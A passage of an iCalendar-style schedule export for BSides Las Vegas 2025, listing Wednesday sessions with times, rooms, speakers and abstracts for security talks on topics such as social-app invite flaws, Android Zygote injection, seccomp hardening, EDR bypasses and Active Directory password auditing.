            <dtend>20250806T104500</dtend>
            <duration>004500</duration>
            <summary>Breaking the Guest List: Hacking Invitation Systems for Fun and Profit</summary>
            <description>Invitation systems are an essential part of many social platforms, designed to help users connect and engage. However, these systems can also harbor subtle business logic flaws that, when exploited, allow attackers to manipulate their functionality in unexpected ways. This talk uncovers how vulnerabilities in social media invitation mechanisms can lead to severe security risks.

Through detailed examples from Facebook and Snapchat, I&#x27;ll share how I:

- Discovered a way to create permanent invites in Facebook Groups, granting indefinite access to outsiders.
- Exploited flaws in Facebook&#x27;s friend management system to stay friends with anyone indefinitely, bypassing their attempts to remove me.
- Broke Snapchat’s invitation system to block legitimate users from accessing their own accounts.

This session will explore the technical and logical breakdowns behind these exploits, showing how these vulnerabilities could be leveraged by attackers for persistent access, privacy violations, and account disruption. Attendees will learn how to identify, prevent, and fix business logic vulnerabilities in their own systems, strengthening the overall security of user interaction workflows.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRR3WQ/</url>
            <location>Florentine A</location>
            
            <attendee>Ali Kabeel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>YGNSNC@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-YGNSNC</pentabarf:event-slug>
            <pentabarf:title>The Age of  Zygote Injection</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T114500</dtend>
            <duration>004500</duration>
            <summary>The Age of  Zygote Injection</summary>
            <description>This project, called Yaga, was developed with the goal of learning how Zygote injection attacks and frameworks like Riru and Zygisk work, and how they can be applied in an offensive context. Over the past two years, I’ve become fascinated by understanding how the Android system works and how its behavior differs from other operating systems.

The Zygote process is the first one launched on Android, acting as a template or interface for spawning other processes. Due to its elevated privileges, it can interact with any application, unlike the highly restricted communication between apps enforced by Android’s SELinux policies. This makes Zygote an interesting target for bypassing Android’s sandboxing mechanisms.

Today, many people use root binaries like Magisk to customize their devices without understanding what the modules do. Some modules might even use Zygisk to steal sensitive user information or hook critical application functions to subvert them!

In this talk, I will explain and demonstrate how these injections are carried out during the loader process, Zygote hooking, and hooking of both native and Dalvik (DEX) application code.

In a few years or months, I hope to use this project as a tool or a way to educate others on how to conduct these attacks and emphasize the importance of studying this technique deeply.

Reference Projects:
Riru - https://github.com/RikkaApps/Riru
Zygisk - https://github.com/topjohnwu/Magisk
ARTDroid - https://github.com/vaioco/ARTDroid

The Yaga project will be released at the beginning of June! I will put a PoC here to give an idea of what is coming. In the video I show the installation of the Magisk module and a log message, coming from the Zygote process, showing that the injection was performed successfully and making it print process names:
https://drive.google.com/file/d/1U3WYDDI5KS2B-uGUdYTdpgKkHIhKJnkK/view?usp=sharing

The project will be released on my GitHub:
https://github.com/Tricta</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/YGNSNC/</url>
            <location>Florentine A</location>
            
            <attendee>Tricta</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZSU7J8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZSU7J8</pentabarf:event-slug>
            <pentabarf:title>The Two Types of Fool - Generations in Cybersecurity</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T120000</dtstart>
            <dtend>20250806T124500</dtend>
            <duration>004500</duration>
            <summary>The Two Types of Fool - Generations in Cybersecurity</summary>
            <description>Keynote, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZSU7J8/</url>
            <location>Florentine A</location>
            
            <attendee>Casey John Ellis</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HWGE3E@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HWGE3E</pentabarf:event-slug>
            <pentabarf:title>Closing Ceremony</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T130000</dtstart>
            <dtend></dtend>
            <duration>010000</duration>
            <summary>Closing Ceremony</summary>
            <description>Closing Ceremony</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HWGE3E/</url>
            <location>Florentine A</location>
            
            <attendee>milqtst</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7YTJNV@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7YTJNV</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Resume Reviews, Wednesday Morning</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T115500</dtend>
            <duration>015500</duration>
            <summary>Hire Ground Resume Reviews, Wednesday Morning</summary>
            <description>Free resume reviews in Hire Ground.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7YTJNV/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RUSV93@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RUSV93</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Opens, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T083000</dtstart>
            <dtend>20250806T083000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Opens, Wednesday</summary>
            <description>Silent Auction Opens</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RUSV93/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>B7AYTL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-B7AYTL</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Opens, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T083000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Middle Ground Opens, Wednesday</summary>
            <description>Middle Ground Opens, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/B7AYTL/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LLYXAP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LLYXAP</pentabarf:event-slug>
            <pentabarf:title>Morning Talks, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend></dtend>
            <duration>020000</duration>
            <summary>Morning Talks, Wednesday</summary>
            <description>Morning Talks, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LLYXAP/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XYBGFV@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XYBGFV</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Closes, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T110000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Closes, Wednesday</summary>
            <description>Silent Auction Closes</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XYBGFV/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NWHBU3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NWHBU3</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Closes, Wednesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T140000</dtstart>
            <dtend>20250806T140000</dtend>
            <duration>000000</duration>
            <summary>Middle Ground Closes, Wednesday</summary>
            <description>Middle Ground Closes, Wednesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NWHBU3/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>S3QCRP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-S3QCRP</pentabarf:event-slug>
            <pentabarf:title>Hardening Containers with Seccomp: Hands-On Profiles, Pitfalls, and Real Exploits</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T104500</dtend>
            <duration>004500</duration>
            <summary>Hardening Containers with Seccomp: Hands-On Profiles, Pitfalls, and Real Exploits</summary>
            <description>Containers have transformed how we build and deploy applications, but the attack surface at runtime remains dangerously exposed in many environments. Seccomp, Linux’s built-in syscall filtering mechanism, offers a powerful way to reduce that surface, but it’s often seen as too painful or risky to apply in production. This talk takes a practical, hands-on approach to solving that.
We&#x27;ll start by grounding the audience in what seccomp is, why it&#x27;s critical for modern container security, and where profiles and the ecosystem fall short. From there, we&#x27;ll dive into live demonstrations: showing how to monitor actual container behavior, generate tailored seccomp profiles using open-source tools like Kubescape, and deploy these profiles effectively within Kubernetes environments.
We&#x27;ll walk through a real-world vulnerable application (Apache Druid) and demonstrate a remote code execution exploit inside a container. Then, using a generated seccomp profile, we&#x27;ll block the attacker’s execution path live, without changing the application code.
Along the way, we’ll tackle real operational pitfalls: handling noisy apps, evolving profiles with your software lifecycle, and keeping the dev team moving without constant breakages.
Attendees will leave with precise, repeatable techniques for using syscall filtering to harden their workloads against real-world attacks and a realistic sense of the strengths and limitations of seccomp as a defense-in-depth strategy.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/S3QCRP/</url>
            <location>Florentine E</location>
            
            <attendee>Ben Hirschberg</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>78QXVQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-78QXVQ</pentabarf:event-slug>
            <pentabarf:title>Russian Nesting Dolls: when Turla got into the ISI who was into an Indian Embassy, and how we found them</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T114500</dtend>
            <duration>004500</duration>
            <summary>Russian Nesting Dolls: when Turla got into the ISI who was into an Indian Embassy, and how we found them</summary>
            <description>This talk came from research that took place over the course of a year, but the overall scope of activity had been going on for roughly 3 years. We originally got on the trail of a ReverseRAT sample and developed analytics that allowed us to enumerate the C2s being used by Sidecopy. Soon we found some interesting aspects that led us down the rabbit hole. The first of which was the Hak5 device that communicated with those Pakistani C2s from inside an Indian Embassy in Europe. This was our first sign of something very interesting, as we don&#x27;t see that every day. We&#x27;ll talk about how that was identified and of course we can speculate on how a physical device got in there, but as interesting as it is, that&#x27;s a story we can only guess at. In this case, they were clearly going after some of their more strategic objectives, breaking into the Indian government and those of their neighbors in Afghanistan, while keeping tabs on the government in Syria during the conflict there. 
Where things got even more interesting is how pivoting off those original ISI C2s led us to Turla.
Given the international climate over the last few years, Turla was of special interest to us. Turla is infamous for using old-school spycraft to camouflage their activities by working through others&#x27; infrastructure and appearing to be anything other than what they are. While we can expect them to stay true to their core techniques in the future, our reporting has changed some of their activities and we&#x27;ll include that in the talk. 
The talk will chart the connections of the ISI into their targets, as well as those of Turla into the ISI and downstream in each direction. We&#x27;ll be using slides to show the scope of activity, and to describe the tradecraft and tools used by both parties. We&#x27;ll also go over some of the indicators that defenders can use to help identify tendencies that reveal these threat actors. 
And of course, we&#x27;ll have some memes along the way. Probably some dogs in there for good measure.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/78QXVQ/</url>
            <location>Florentine E</location>
            
            <attendee>Danny Adamitis</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZNXL8D@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZNXL8D</pentabarf:event-slug>
            <pentabarf:title>UNION SELECT * FROM hackers: Why We Should Be Building InfoSec Worker Power Through the Labor Movement</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T104500</dtend>
            <duration>004500</duration>
            <summary>UNION SELECT * FROM hackers: Why We Should Be Building InfoSec Worker Power Through the Labor Movement</summary>
            <description>In recent years, there has been high-level talk within the InfoSec community about the role for organized labor in the community but with no active stakeholders &quot;from labor&quot; or practical InfoSec worker organizing experience present (see Cory Doctorow&#x27;s DEF CON 32 talk, the White House&#x27;s Cybersecurity Workforce Strategy, etc.). Similarly, in the tech worker space, I&#x27;ve noticed very little attention given explicitly to InfoSec workers and the unique considerations that apply to our community and industry.

I am mildly frustrated by this discrepancy, particularly since I&#x27;ve been involved with the labor movement long before I ever wrote my first &quot;Hello World&quot; program. It’s also a discrepancy ripe with opportunity, as many of the skills and values that define the InfoSec community are directly applicable to labor organizing. This talk is my attempt to start remediating the situation by making the pitch for unions and broader labor movement organizing to the InfoSec community as a member of both this community and the labor movement.

Initially, I waited to pitch this talk to Hacker Summer Camp until I could find a coalition of other unionized InfoSec professionals, or until I had buy-in from other parts of the labor movement that may be able to process any increased interest generated by this talk. However, the recent deterioration of the community&#x27;s soft power policy influence and heightened attacks on the labor movement convinced me of the urgency of giving this talk this year.

This talk builds on arguments on the need for and utility of tech sector unions made by Cory Doctorow, Ethan Marcotte, the Tech Workers Coalition, various tech unions, grassroots organizers, and others. I tailor those general arguments towards the InfoSec community and industry to stress the relevance of organized labor as one of the best tools this community has to build power and influence people as we lose the voluntary deference, particularly as individuals, we received from our bosses and the government in the past.

This talk goes beyond a few words on how &quot;you should unionize your workplace!&quot; and provides an in-depth discussion on why building collective power as workers is more important now than ever, shows how it has worked in ways other forms of organizing cannot, and provides practical insight from the perspective of someone who actively represents developers, incident responders, analysts, auditors, cloud engineers, etc. when I&#x27;m not in a terminal or VSCode.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZNXL8D/</url>
            <location>Florentine F</location>
            
            <attendee>Logan Arkema</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9WYQKB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9WYQKB</pentabarf:event-slug>
            <pentabarf:title>Breaking the Illusion: Bypassing Endpoint Security Controls with Simple Tactics</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T114500</dtend>
            <duration>004500</duration>
            <summary>Breaking the Illusion: Bypassing Endpoint Security Controls with Simple Tactics</summary>
            <description>At BSidesLV, we will unveil previously undisclosed vulnerabilities affecting Microsoft Defender and Zscaler—flaws currently being triaged by Microsoft and coordinated with US-CERT. These vulnerabilities expose critical weaknesses in how endpoint and network security solutions enforce protection and prevent tampering.

But beyond new vulnerabilities, this talk will demonstrate how EDR solutions can be bypassed using built-in OS functionality, overlooked misconfigurations, and flawed integrity protections—no exploits, no malware, just simple, repeatable techniques that adversaries are already using.

Organizations often assume that EDR is resilient—that once deployed, it provides a reliable defense against attackers. But what happens when an adversary removes, disables, or renders it ineffective using nothing more than tools already available on the system?

We will walk through real-world examples of how:

- Scripts found in the wild silently bypass endpoint security uninstallation logic.
- EDR solutions fail to enforce self-protection, allowing simple tampering techniques.
- Native Windows tools like wmic, sc, and PowerShell can be abused to disable or remove security software.
- Newly discovered vulnerabilities in Defender and Zscaler can be exploited to weaken security controls.

This talk will include exclusive first-time disclosures of new security weaknesses alongside live demonstrations of real-world security bypasses that work today.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9WYQKB/</url>
            <location>Florentine F</location>
            
            <attendee>Blake Hudson</attendee>
            
            <attendee>Caleb Sargent</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZUWAF8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZUWAF8</pentabarf:event-slug>
            <pentabarf:title>Password ~Audit~ Cracking in AD: The Fun Part of Compliance</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T104500</dtend>
            <duration>004500</duration>
            <summary>Password ~Audit~ Cracking in AD: The Fun Part of Compliance</summary>
            <description>To begin, we will present the latest NIST recommendation for passwords and the risks and benefits of implementing them. We will also present our 3 corporations (with AI generated icon style images) (~5 mins)

We will then jump into the heart of the subject.

**Attack 1**: Password Spray
We will present stats about breaches that start with Brute Force/PassSpray attacks.
We&#x27;ll see how YOLO Corp falls from an exposed RDP service to a ransomware scenario, versus CoolSec, who was able to both detect the attack and resist the PassSpray attacks because they audit their passwords and eliminate the common ones (~5 mins)

**Attack 2**: Evils gets a copy of NTDS.dit from an unprotected backup from YOLO Corp &amp; CoolSec
They attempt to crack the passwords. Typically that&#x27;ll get over 50% of the passwords within a few days, and some will fall in seconds (anything that is 7 characters long).
We will then see that dumping NTDS.dit from your DC to perform a Password Audit isn&#x27;t the most elegant way to go about it. Fortunately, Michael Grafnetter&#x27;s DSInternals has got us covered. This Open Source PowerShell project will pull the information from the DC (just like the DCSync attack) and will perform some basic analysis of the hashes found. We will go over the main modules of this project and how to configure a user that can fetch the hashes.
And finally, how to detect this type of activity if another user (or if that account ever gets compromised!!) ever performs a similar action (~15 mins)

From there it&#x27;s also easy (built-in command) to convert the user &amp; hash to a format John the Ripper or Hashcat can ingest for additional cracking. We will go over some effective password cracking rules and methodology for Hashcat and reference Travis Palmer&#x27;s Defcon 28 Red Team Village talk &quot;Passwd Cracking Beyond 15 Chars, Under $500&quot;
Using either Password Filter or Azure AD &quot;ban list&quot; we can prevent users from choosing derivatives of these weak passwords in the future (~10 mins)

In conclusion we&#x27;ll cover how, once you have DSInternals &amp; Hashcat in place, it&#x27;s easy to create a wrapper script to automate the whole process:
- Extract the hashes
- Run a few checks on hashes (without cracking)
  - Any previously cracked hash present
  - Any hash associated with multiple accounts
  - Etc. 
- Launch a Password cracker against the account
- Force change password on accounts with &quot;known passwords&quot; 
- Send a communication to the account&#x27;s owner. 
(~5 mins)

After attending this talk the attendees should leave the room with knowledge about the latest NIST recommendation for passwords and a plan to enforce them while making sure their users are not using weak passwords and putting the whole enterprise at risk.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZUWAF8/</url>
            <location>Tuscany</location>
            
            <attendee>Mat Saulnier</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BWUGRH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BWUGRH</pentabarf:event-slug>
            <pentabarf:title>Password Expiry is Dead: Real-World Metrics on What Rotation Actually Achieves</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T112000</dtend>
            <duration>002000</duration>
            <summary>Password Expiry is Dead: Real-World Metrics on What Rotation Actually Achieves</summary>
            <description>Our talk debunks the myth that routine password expiration improves security. Many audit outcomes and recommendations push for password expiration as a way to prevent attacks. Using historical and real cracked password data, we show how forced rotations lead to predictable patterns and weaker passwords, not stronger ones, and we propose smarter, risk-based alternatives to legacy policies.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BWUGRH/</url>
            <location>Tuscany</location>
            
            <attendee>Dimitri Fousekis</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RGNJER@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RGNJER</pentabarf:event-slug>
            <pentabarf:title>Root Cause and Attack Flows: Interpretable ML for Alert &amp; Log Correlation</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T104500</dtend>
            <duration>004500</duration>
            <summary>Root Cause and Attack Flows: Interpretable ML for Alert &amp; Log Correlation</summary>
            <description>This talk introduces an open-source approach to alert correlation and attack flow reconstruction using interpretable machine learning—not LLMs or black-box AI. Designed for SOC analysts and defenders, the presentation walks through how to map logs and alerts to MITRE ATT&amp;CK techniques, cluster them into meaningful stages, and chain those stages into full attack narratives. The goal is to expose coordinated attacks that hide within fragmented telemetry, false positives, and lone incidents.

Attendees will learn how to apply context-driven techniques—like density-based clustering, temporal graph modeling, and simple NLP classifiers—to turn noisy data into actionable insight. We’ll demonstrate how the Attack Flow Detector tool performs this work in real-world-style environments, outputting root cause analysis and ticket-ready reports. The talk emphasizes transparency, explainability, and practicality—giving hackers and blue teamers a framework to trace attacker movement through data they already have, without needing search-heavy SIEMs or opaque AI platforms.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RGNJER/</url>
            <location>Siena</location>
            
            <attendee>Ezz Tahoun</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9CCKBA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9CCKBA</pentabarf:event-slug>
            <pentabarf:title>A Winning Competition</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T112000</dtend>
            <duration>002000</duration>
            <summary>A Winning Competition</summary>
            <description>As new security challenges arise, hands-on competitions are vital for training the next generation of defenders and responders. Collegiate cyber competitions like WRCCDC and CIRCUS serve dual roles: they test students’ technical skills under pressure and expose them to real-world operational and legal contexts. WRCCDC places teams in the role of network administrators defending “commercial” infrastructure against persistent red-team attacks, while CIRCUS challenges participants to perform deep forensic analysis and defend findings before legal professionals. This talk will go over operational insights and technical challenges in running different structured competitions. You will gain insights into competition architecture, work involved in creating realistic scenarios, custom software development work, scoring mechanisms, red-team integration, and team development strategies that foster collaboration and technical proficiency. We’ll also delve into role assignment (e.g., network, system, application, forensics, reporting) and training regimens, culminating in a blueprint for both organizers and competitors.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9CCKBA/</url>
            <location>Siena</location>
            
            <attendee>Wasabi</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>AWLR99@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-AWLR99</pentabarf:event-slug>
            <pentabarf:title>Manufacturing Breakthroughs: How Conflict Leads to Innovation</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T113000</dtstart>
            <dtend>20250806T115000</dtend>
            <duration>002000</duration>
            <summary>Manufacturing Breakthroughs: How Conflict Leads to Innovation</summary>
            <description>Cybersecurity is a field filled with contradictions: how do we balance security with openness, privacy with functionality, or resilience with complexity? TRIZ (Theory of Inventive Problem Solving) offers a roadmap for navigating these dilemmas systematically. Originally developed in engineering, TRIZ is a structured methodology that helps identify existing solutions to seemingly unsolvable problems by resolving contradictions and leveraging patterns of innovation.

Think of TRIZ as a GPS for problem-solving. The contradiction matrix acts as a “decision tree for conflicts,” guiding professionals to resolutions without compromise. Patterns of evolution serve as “forecasting the weather in technology,” enabling organizations to anticipate future risks and opportunities based on predictable progressions.

This talk focuses on applying TRIZ principles to three critical domains in cybersecurity: supply chain security, dark web economies, and critical infrastructure resilience. Using vivid case studies—such as anti-phishing strategies that leverage contradiction resolution techniques or data leakage prevention through segmentation—attendees will see how TRIZ can transform their approach to problem-solving.

By the end of this session, participants will understand how to integrate TRIZ into their analytical processes, empowering them to anticipate threats, minimize surprises, and design resilient systems that adapt dynamically to emerging challenges.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/AWLR99/</url>
            <location>Siena</location>
            
            <attendee>Munish Walther-Puri</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GAYADE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GAYADE</pentabarf:event-slug>
            <pentabarf:title>NA</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
            <dtend>20250806T103000</dtend>
            <duration>003000</duration>
            <summary>NA</summary>
            <description>NA</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GAYADE/</url>
            <location>Copa</location>
            
            <attendee>NA</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MQCNWH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MQCNWH</pentabarf:event-slug>
            <pentabarf:title>Neighborhood &amp; Household Resilience- A Month Without External Assistance.</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T103000</dtstart>
            <dtend>20250806T110000</dtend>
            <duration>003000</duration>
            <summary>Neighborhood &amp; Household Resilience- A Month Without External Assistance.</summary>
            <description>This panel will discuss approaches to maintaining a one-month supply of food, water, and medicine per household member to ensure self-sufficiency during extreme emergencies. Such events—ranging from hurricanes and earthquakes to cyberattacks and pandemics—can disrupt supply chains, utilities, and emergency services, leaving communities isolated and vulnerable. David will be joined by some guests to talk about the art of the possible as it relates to maintaining resilience within the home and community.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MQCNWH/</url>
            <location>Copa</location>
            
            <attendee>David Batz</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>WFYFWE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-WFYFWE</pentabarf:event-slug>
            <pentabarf:title>Time is Running Out - Tying it All Together - What Will You Do in the Near Term?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T110000</dtstart>
            <dtend>20250806T120000</dtend>
            <duration>010000</duration>
            <summary>Time is Running Out - Tying it All Together - What Will You Do in the Near Term?</summary>
